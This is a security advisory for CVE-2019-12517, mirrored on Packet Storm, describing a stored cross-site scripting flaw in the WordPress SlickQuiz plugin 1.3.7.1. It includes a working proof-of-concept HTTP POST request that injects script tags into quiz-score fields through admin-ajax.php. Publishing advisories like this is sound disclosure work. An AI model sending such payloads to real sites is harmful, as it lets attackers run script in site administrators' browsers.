exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress SlickQuiz 1.3.7.1 Cross Site Scripting

WordPress SlickQuiz 1.3.7.1 Cross Site Scripting
Posted Sep 10, 2019
Authored by Julien Ahrens | Site rcesecurity.com

WordPress SlickQuiz plugin version 1.3.7.1 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2019-12517
SHA-256 | cbb9b82d8abba98ceec52791f9d154653f25751db87716fba4d0f5bdb5a37486

WordPress SlickQuiz 1.3.7.1 Cross Site Scripting

Change Mirror Download
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: SlickQuiz
Vendor URL: https://wordpress.org/plugins/slickquiz/
Type: Cross-Site Scripting [CWE-79]
Date found: 2019-05-30
Date published: 2019-09-10
CVSSv3 Score: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
CVE: CVE-2019-12517


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
SlickQuiz for Wordpress 1.3.7.1 (latest)


4. INTRODUCTION
===============
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The "save_quiz_score" functionality available to unauthenticated users via the
Wordpress "/wp-admin/admin-ajax.php" endpoint allows unauthenticated users to
submit quiz solutions/answers. If the configuration option "Save user scores"
is enabled (disabled by default), the response is stored in the database and
later shown in the Wordpress backend for all users with at least Subscriber
rights.

However, since the plugin does not properly validate and sanitize the quiz
response, a malicious XSS payload in either the name, the email or the score
parameter like:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
DNT: 1
Connection: close

action=save_quiz_score&json={"name":"Na<script>alert(document.domain)</script>
me","email":"info@local<script>alert(document.domain)</script>host",
"score":"<script>alert(document.domain)</script>","quiz_id":1}

is executed directly within the backend at "/wp-admin/admin.php?page=slickquiz"
across all users with the privileges of at least subscriber and up to admin.


6. RISK
=======
To successfully exploit this vulnerability an authenticated user must be tricked
into visiting the SlickQuiz administrative backend on the affected Wordpress
installation.

The vulnerability can be used to permanently embed arbitrary script code into the
administrative Wordpress backend, which offers a wide range of possible
attacks such as redirecting the user to a malicious page, spoofing content on the
page or attacking the browser and its plugins.


7. SOLUTION
===========
None (Remove the plugin)


8. REPORT TIMELINE
==================
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12517
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor.
2019-09-10: Public disclosure.


9. REFERENCES
=============
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close